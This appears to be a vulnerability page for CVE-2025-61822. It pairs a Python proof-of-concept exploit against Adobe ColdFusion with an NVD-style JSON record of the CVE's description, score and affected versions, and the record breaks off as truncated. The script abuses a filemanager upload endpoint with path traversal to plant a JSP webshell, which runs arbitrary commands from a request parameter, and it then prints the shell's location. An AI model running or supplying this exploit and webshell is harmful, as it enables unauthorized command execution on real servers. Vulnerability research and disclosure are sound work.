CVE-2025-61822

import requests import sys # CVE-2025-61822 Adobe ColdFusion Arbitrary File Write PoC # Target: Adobe ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier def exploit_coldfusion(target_url, file_path, content): """ Exploit improper input validation to write arbitrary files Args: target_url: Base URL of ColdFusion server file_path: Target file path to write content: Content to write to the file """ # Endpoint vulnerable to improper input validation endpoint = f"{target_url}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfc" # Construct malicious payload # Path traversal to write to arbitrary location payload = { 'method': 'upload', 'path': file_path, 'file': ('webshell.jsp', content, 'application/octet-stream') } try: response = requests.post(endpoint, files=payload, timeout=30) if response.status_code == 200: print(f"[+] File write successful: {file_path}") print(f"[+] Shell location: {target_url}/cf_scripts/{file_path}") return True else: print(f"[-] File write failed: HTTP {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {str(e)}") return False def verify_vulnerability(target_url): """ Verify if the target is vulnerable """ test_endpoint = f"{target_url}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/" try: response = requests.get(test_endpoint, timeout=10) if response.status_code == 200: print("[+] Target appears to be running ColdFusion") print("[+] Filemanager component detected - potential vulnerability") return True except: pass return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-61822.py <target_url>") print("Example: python cve-2025-61822.py http://target.com:8500") sys.exit(1) target = sys.argv[1].rstrip('/') print("=" * 60) print("CVE-2025-61822 Adobe ColdFusion Arbitrary File Write") print("=" * 60) # Verify target if not verify_vulnerability(target): print("[!] Target may not be vulnerable or not reachable") sys.exit(1) # Webshell content webshell = '<%@page import="java.io.*"%><%String cmd=request.getParameter("cmd");if(cmd!=null){Process p=Runtime.getRuntime().exec(cmd);BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));String s;while((s=br.readLine())!=null){out.println(s);}}%>' # Write webshell target_path = "../webapps/cfapi/welcome.jsp" exploit_coldfusion(target, target_path, webshell)

{"cve": {"id": "CVE-2025-61822", "sourceIdentifier": "[email protected]", "published": "2025-12-10T00:16:10.340", "lastModified": "2025-12-12T19:58:58.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system write. An attacker could exploit this vulnerability to write malicious files to arbitrary locations on the file system. Exploitation of this issue does not require user interaction and scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:-:*:*:*:*:*:*", "matchCriteriaId": "7A94B406-C011-4673-8C2B-0DD94D46CC4C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update1:*:*:*:*:*:*", "matchCriteriaId": "AFD05E3A-10F9-4C75-9710-BA46B66FF6E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update10:*:*:*:*:*:*", "matchCriteriaId": "F1FC7D1D-6DD2-48B2-980F-B001B0F24473"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update11:*:*:*:*:*:*", "matchCriteriaId": "1FA19E1D-61C2-4640-AF06-4BCFE750BDF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update12:*:*:*:*:*:*", "matchCriteriaId": "3F331DEA-F3D0-4B13-AB1E-6FE39B2BB55D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update13:*:*:*:*:*:*", "matchCriteriaId": "63D5CF84-4B0D-48AE-95D6-262AEA2FFDE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update14:*:*:*:*:*:*", "matchCriteriaId": "10616A3A-0C1C-474A-BD7D-A2A5BB870F74"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update15:*:*:*:*:*:*", "matchCriteriaId": "D7DA523E-1D9B-45FD-94D9-D4F9F2B9296B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update16:*:*:*:*:*:*", "matchCriteriaId": "151AFF8B-F05C-4D27-85FC-DF88E9C11BEA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update17:*:*:*:*:*:*", "matchCriteriaId": "53A0E245-2915-4DFF-AFB5-A12F5C435702"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update18:*:*:*:*:*:*", "matchCriteriaId": "C5653D18-7534-48A3-819F-9F049A418F99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update19:*:*:*:*:*:*", "matchCriteriaId": "BABC6468-A780-4080-A930-4125D1B39C51"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update2:*:*:*:*:*:*", "matchCriteriaId": "D57C8681-AC68-47DF-A61E-B5C4B4A47663"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update20:*:*:*:*:*:*", "matchCriteriaId": "F58633C9-E957-46B7-8F5B-B060A8726E33"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update21:*:*:*:*:*:*", "matchCriteriaId": "3CF83653-86BB-461A-87F8-65D99EF2276E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update22:*:*:*:*:*:*", "matchCriteriaId": "C2C67E15-22DE-44C0-8CB1-9AF8FCF09FA5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update3:*:*:*:*:*:*", "matchCriteriaId": "75608383-B727-48D6-8FFA-D552A338A562"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update4:*:*:*:*:*:*", "matchCriteriaId": "7773DB68-414A-4BA9-960F-52471A784379"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update5:*:*:*:*:*:*", "matchCriteriaId": "B38B9E86-BCD5-4BCA-8FB7-EC55905184E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update6:*:*:*:*:*:*", "matchCriteriaId": "5E7BAB80-8455-4570-A2A2-8F40469EE9CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update7:*:*:*:*:*:*", "matchCriteriaId": "F9D645A2-E02D-4E82-A2BD-0A7DE5B8FBCC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update8:*:*:*:*:*:*", "matchCriteriaId": "6E22D701-B038-4795-AA32-A18BC93C2B6F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2021:update9:*:*:*:*:*:*", "matchCriteriaId": "CAC4A0EC-C3FC-47D8-86CE-0E6A87A7F0B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:-:*:*:*:*:*:*", "matchCriteriaId": "B02A37FE-5D31-4892-A3E6-156A8FE62D28"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:coldfusion:2023:update1:*:*:*:*:*:*", "matchCriteriaId": "0AA3D302-CFEE-4DFD-AB92-F53C87721BFF"}, ... (truncated)